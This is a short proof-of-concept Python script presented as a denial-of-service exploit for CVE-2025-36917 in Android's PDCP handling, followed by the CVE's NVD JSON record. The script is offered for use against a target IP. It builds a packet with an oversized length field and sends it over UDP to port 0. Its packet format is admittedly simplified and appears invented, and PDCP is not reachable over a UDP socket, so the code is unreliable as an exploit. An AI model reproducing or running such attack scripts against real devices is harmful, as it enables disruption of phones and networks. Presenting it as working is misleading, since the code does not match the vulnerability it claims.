CVE-2025-36917

# CVE-2025-36917 PoC - Android PDCP DoS # This PoC demonstrates sending malformed PDCP packets to trigger the boundary check error # Note: Requires access to mobile network interface import socket import struct def create_malformed_pdcp_packet(): """ Create a malformed PDCP packet to trigger CVE-2025-36917 The vulnerability exists in SwDcpItg function due to incorrect bounds check """ # PDCP header structure (simplified) pdcp_header = bytearray() # DCP Data PDU with invalid length field # Setting data length that exceeds actual payload pdcp_header.append(0x00) # PDCP data header byte 1 pdcp_header.append(0x00) # PDCP data header byte 2 # Add malicious length value that triggers bounds check error malformed_length = struct.pack('>H', 0xFFFF) # Max length value pdcp_header.extend(malformed_length) # Add minimal payload to trigger the error condition payload = b'\x00' * 10 return bytes(pdcp_header + payload) def exploit_cve_2025_36917(target_ip, target_port=0): """ Send malformed PDCP packet to trigger denial of service """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) malformed_packet = create_malformed_pdcp_packet() print(f"[*] Sending malformed PDCP packet to {target_ip}") print(f"[*] Packet size: {len(malformed_packet)} bytes") # Send to mobile network interface sock.sendto(malformed_packet, (target_ip, target_port)) sock.close() print("[+] Malformed packet sent successfully") print("[+] If vulnerable, target may experience DoS condition") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve_2025_36917_poc.py <target_ip>") sys.exit(1) exploit_cve_2025_36917(sys.argv[1])

{"cve": {"id": "CVE-2025-36917", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:56.267", "lastModified": "2025-12-12T17:27:30.313", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In SwDcpItg of up_L2commonPdcpSecurity.cpp, there is a possible denial of service due to an incorrect bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://source.android.com/security/bulletin/pixel/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}